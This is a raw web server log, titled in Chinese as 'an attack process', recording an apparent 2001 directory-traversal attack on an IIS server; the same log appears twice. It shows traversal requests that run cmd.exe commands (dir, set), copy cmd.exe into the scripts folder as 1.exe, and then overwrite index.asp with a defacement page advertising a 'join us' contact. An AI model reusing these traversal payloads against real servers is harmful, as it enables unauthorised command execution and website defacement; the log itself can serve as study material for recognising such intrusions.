一次攻击过程
../winnt/system32/cmd.exe, /c+dir+c:\ 500
../winnt/system32/cmd.exe, /c+dir+c:\ 500
../winnt/system32/cmd.exe, /c+dir+c:\ 200
../winnt/system32/cmd.exe, /c+dir+c:\ 200
../winnt/system32/cmd.exe, /c+dir+c:\ 200
../winnt/system32/cmd.exe, /c+dir+c:\ 200
../winnt/system32/cmd.exe, /c+dir+c:\ 200
../winnt/system32/cmd.exe, /c+dir+c:\ 200
../winnt/system32/cmd.exe, /c+dir+c:\ 200
../winnt/system32/cmd.exe, /c+dir+c:\ 200
../winnt/system32/cmd.exe, /c+dir+c:\ 200
../winnt/system32/cmd.exe, /c+dir+c:\ 500
../winnt/system32/cmd.exe, /c+dir+c:\ 200
../winnt/system32/cmd.exe, /c+dir+c:\ 404
../mssql7/install/pubtext.bat"+&+dir+c:\ 403
../winnt/system32/cmd.exe, /c+dir+c:\ 500
../winnt/system32/cmd.exe\, /c\+dir+c:\ 404
../winnt/system32/cmd.exe, /c+set 502
../winnt/system32/cmd.exe, /c+copy+c:\winnt\system32\cmd.exe+c:\Inetpub\scripts\1.exe 502
../Inetpub/scripts/1.exe, /c+dir+c:\ 200
../Inetpub/scripts/1.exe, /c+set 502
../Inetpub/scripts/1.exe, /c+dir+C:\InetPub\wwwroot\fastinfo\ 200
../Inetpub/scripts/1.exe, /c+echo+rty>C:\InetPub\wwwroot\fastinfo\index.asp 502
152.158.208.65 01-4-17 5:25:19 GET /index.asp 200
152.158.208.65 01-4-17 5:25:37 GET /scripts/..\../Inetpub/scripts/1.exe, 502
/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<title^> join+us:[email protected]^</title^>^<BR^>^<BR^>^<BR^>^<BR^>^<BR^>^<P+ALIGN%3D"CENTER"^>^<IMG+SRC%3D"http://www.hot.ee/rockomm/guru.jpg"+WIDTH%3D488+HEIGHT%3D87^>^</P^>^<BR^>^<BR^>^<BR^>^<BR^>^<BR^>^<BR^>^<BR^>^<BR^>^</FONT^>^<B^>^<FONT+FACE%3DArial+SIZE%3D1+COLOR%3Dsilver^>^<P+ALIGN%3DRIGHT^>^[SecurityNewsPortal.com]^</P^>^</B^>^</FONT^>^<FONT+COLOR%3Dsilver^>^<P+ALIGN%3DRIGHT^>^</P^>^</FONT^>^</BODY^>^</HTML^>>C:\InetPub\wwwroot\fastinfo\index.asp 502
152.158.208.65 01-4-17 5:25:43 GET /index.asp 200
../winnt/system32/cmd.exe, /c+dir+c:\ 500
../winnt/system32/cmd.exe, /c+dir+c:\ 200
../winnt/system32/cmd.exe, /c+dir+c:\ 200
../winnt/system32/cmd.exe, /c+dir+c:\ 200
../winnt/system32/cmd.exe, /c+dir+c:\ 200
../winnt/system32/cmd.exe, /c+dir+c:\ 200
../winnt/system32/cmd.exe, /c+dir+c:\ 200
../winnt/system32/cmd.exe, /c+dir+c:\ 200
../winnt/system32/cmd.exe, /c+dir+c:\ 200
../winnt/system32/cmd.exe, /c+dir+c:\ 200
../winnt/system32/cmd.exe, /c+dir+c:\ 500
../winnt/system32/cmd.exe, /c+dir+c:\ 200
../winnt/system32/cmd.exe, /c+dir+c:\ 404
../mssql7/install/pubtext.bat"+&+dir+c:\ 403
../winnt/system32/cmd.exe, /c+dir+c:\ 500
../winnt/system32/cmd.exe\, /c\+dir+c:\ 404
../winnt/system32/cmd.exe, /c+set 502
../winnt/system32/cmd.exe, /c+copy+c:\winnt\system32\cmd.exe+c:\Inetpub\scripts\1.exe 502
../Inetpub/scripts/1.exe, /c+dir+c:\ 200
../Inetpub/scripts/1.exe, /c+set 502
../Inetpub/scripts/1.exe, /c+dir+C:\InetPub\wwwroot\fastinfo\ 200
../Inetpub/scripts/1.exe, /c+echo+rty>C:\InetPub\wwwroot\fastinfo\index.asp 502
152.158.208.65 01-4-17 5:25:19 GET /index.asp 200
152.158.208.65 01-4-17 5:25:37 GET /scripts/..\../Inetpub/scripts/1.exe, 502
/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<title^> join+us:[email protected]^</title^>^<BR^>^<BR^>^<BR^>^<BR^>^<BR^>^<P+ALIGN%3D"CENTER"^>^<IMG+SRC%3D"http://www.hot.ee/rockomm/guru.jpg"+WIDTH%3D488+HEIGHT%3D87^>^</P^>^<BR^>^<BR^>^<BR^>^<BR^>^<BR^>^<BR^>^<BR^>^<BR^>^</FONT^>^<B^>^<FONT+FACE%3DArial+SIZE%3D1+COLOR%3Dsilver^>^<P+ALIGN%3DRIGHT^>^[SecurityNewsPortal.com]^</P^>^</B^>^</FONT^>^<FONT+COLOR%3Dsilver^>^<P+ALIGN%3DRIGHT^>^</P^>^</FONT^>^</BODY^>^</HTML^>>C:\InetPub\wwwroot\fastinfo\index.asp 502
152.158.208.65 01-4-17 5:25:43 GET /index.asp 200